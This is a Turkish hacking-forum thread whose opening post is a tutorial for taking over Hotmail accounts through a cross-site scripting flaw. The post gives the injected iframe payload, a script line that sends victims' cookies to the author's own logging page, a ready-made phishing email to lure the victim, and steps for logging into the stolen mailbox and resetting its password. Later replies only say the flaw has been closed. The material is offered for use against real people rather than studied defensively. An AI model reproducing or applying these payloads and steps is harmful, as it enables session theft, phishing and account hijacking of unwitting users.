![]() |
|
Eskiler (Arşiv) Eski konular |
![]() ![]() |
|
Konu Seçenekleri | Görünüm Şekli |
![]() |
#1 |
Forum Aşığı
![]() Kayit Tarihi: Feb 2007
Nerden: ¢αкαℓ.ηєттєη
Yaş: 30
Mesajlari: 4,929
Teşekkür Etme: 235 Teşekkür Edilme: 266 Teşekkür Aldığı Konusu: 182
Üye No: 31562
Rep Power: 2368
Rep Puanı : 11542
Rep Derecesi :
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Cinsiyet : Erkek
|
![]() Mail Hack’in en qüzel yöntemlerinden olan Hotmail XSS açığını anlatalım..
Öncelikle dosyalarımızı rar’a attığım şekilde kendi hostumuza atıyoruz..Ve bu dosyaları kendi sitemize qöre editliyoruz.. ama ilk önce dosyalar arasında "c.js" var.. bunu not defterinde açın ve ; i=new/**/Image();i.src= "http://www.volqan.org/portal/sistem/s.php? +">i=new/**/Image();i.src= "http://www.volqan.org/portal/log.php? +"> şu kısmı bulup " voLqan.Org " linkini kendi sitenizin adıyla editleyin ve bu şekilde kaydedin.. Daha sonra tüm dosyaları rar’ladığım şekilde hostunuza atın.. Detaya inmek istiyorum dosyanın içinde log.php dosyasını yani portal/system/log.php’yi kendinize qöre editleyebilirisiniz.. Mesela orda snif’ten cookie bilqilerini almak için kullanıcı adı ve şifre " admin - voLqan " şeklinde.. Yani ; $kullaniciadi = "admin"; $sifre = "voLqan"; bunu kendinize qöre uyarlayabilirsiniz.. Böylece cookie’leri aldığınız log sayfası yalnızca size ait olur ve her qirişte " kullanıcı adı - şifre " ister.. Bu dosyamızı da kendimize qöre ayarladıktan sonra sıra qeldi XSS’mizi kullanmaya.. Bu XSS’i kendi sitemde " portal " klasörüne kurduğumu düşünürsem, kurbana yollayacağım link ; www.volqan.org/portal olacaktır.. Çünkü o klasöre attığım index.html’deki kod yani ; **********document.write(’<iframe name="I1" src= "a target=_blank href=http://calendar.msn.com/tasks/isapi">http://calendar.msn.com/tasks/isapi.dll?request=action&operation=expandcollapse& objectID=0&itemOldStatus=0&httpFrom=“><%53%43%52%4 9%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%77%77% 77%2E%6B%67%73%63%65%6E%74%65%72%2E%6F%72%67%2F%70 %6F%72%74%61%6C%2F%63%2E%6A%73><%2F%53%43%52%49%50 %54>" height="1" width="1" border="0" frameborder="0" marginwidth="1" marginheight="1" style="position: absolute; left: 0; top: 0"> hi</iframe>’) window.status=" " </script> bu kod kurban’ın bu sayfayı qörmesi halinde cookie bilqilerinin elime qeçmesini sağlayacaktır.. kurbanımı seçiyorum ve ona kendi mail hesabımdan şöyle bir mail qönderiyorum.. Konu : yeni portal nasıl olmuş Kimden : [email protected] Konu : merhaba arkadaşım voLqan.Org’a qüzel bir portal kurdum seninde yorumlarını bekliyorum.. www.volqan.org/portal Sağ alt taraftaki kategoriye iyi baq ![]() qibisinden kurbana mailimi yolluyorum ![]() Kurbanımız bu iletiyi alıp verdiğim linke qirdiği anda yani Hotmail box’ı açık iken www.volqan.org/portal kısmına qirdiği anda Cookie’leri bizim log’umuzda beliriyor ![]() ve bende hemen www.voLqan.Org/portal/sistem/log.php? adresime qidip cookie’leri kontrol ediyorum.. ![]() ve qördüğünüz qibi kurbanın cookie bilqileri qelmiş ![]() ![]() http://img295.imageshack.us/img295/4183/sniffzv5.jpg ![]() ![]() ![]() ![]() ![]() ![]() ![]() ve son olarak proxy ayarlarını yaptıktan sonra aldığımız cookie ile http://by103fd.bay103.hotmail.msn.co...hmhome?fti=yes linkinden kurbanın mailine qiriş yapıyoruz..Şifreyi kendimize qöre ayarlamak içinde www.passport.com dan şifre resetleme linkini yolluyoruz ve mail box açıkken şifreyi resetleyip kendimize qöre ayarlıyoruz.. Proxomitron Download Hotmail XSS Dosyaları Download işte Hotmail XSS mevzusu bundan ibaret..Yalnız Hotmail XSS acığı kapandı qibi laflar ortada dolaşıyor.. Hotmail’de XSS bulmak bizim elimizde ![]() ![]()
__________________
:wink:
|
![]() |
![]() |
![]() |
#2 |
Yeni Üye
![]() Kayit Tarihi: Apr 2006
Yaş: 37
Mesajlari: 20
Teşekkür Etme: 1 Teşekkür Edilme: 0 Teşekkür Aldığı Konusu: 0
Üye No: 13044
Rep Power: 1330
Rep Puanı : 10
Rep Derecesi :
![]() Cinsiyet :
|
![]() bu acık kapatıldı
|
![]() |
![]() |
![]() |
#3 |
Yeni Üye
![]() Kayit Tarihi: Dec 2006
Yaş: 39
Mesajlari: 33
Teşekkür Etme: 7 Teşekkür Edilme: 0 Teşekkür Aldığı Konusu: 0
Üye No: 24818
Rep Power: 1284
Rep Puanı : 10
Rep Derecesi :
![]() Cinsiyet :
|
![]() ewt xss kapandı
|
![]() |
![]() |
![]() |
#4 |
Daimi Üye
![]() Kayit Tarihi: Sep 2006
Mesajlari: 917
Teşekkür Etme: 648 Teşekkür Edilme: 71 Teşekkür Aldığı Konusu: 36
Üye No: 18465
Rep Power: 1524
Rep Puanı : 4494
Rep Derecesi :
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Cinsiyet : Erkek
|
![]() alıntımı yaptın eğer yaptıysan yazının altına ALINTI'dır die eklermisinn !
__________________
. |
![]() |
![]() |
![]() ![]() |
Bu Konudaki Online üyeler: 1 (Üye Sayisi : 0 Ziyaretçi Sayisi : 1) | |
|
|
![]() |
||||
Konu | Konu Baslangic | Forum | Cevaplar | Son Mesaj |
Rep Verme (Resimli Anlatım) | GooD aNd EvıL | Eskiler (Arşiv) | 10 | 09-11-2008 09:42 PM |
keyglorer resimli anlatım! | Tilki_Andre | Eskiler (Arşiv) | 0 | 06-12-2007 12:10 AM |
Mp3 Kücültme resimli anlatım | artemis | Eskiler (Arşiv) | 7 | 11-08-2006 01:49 PM |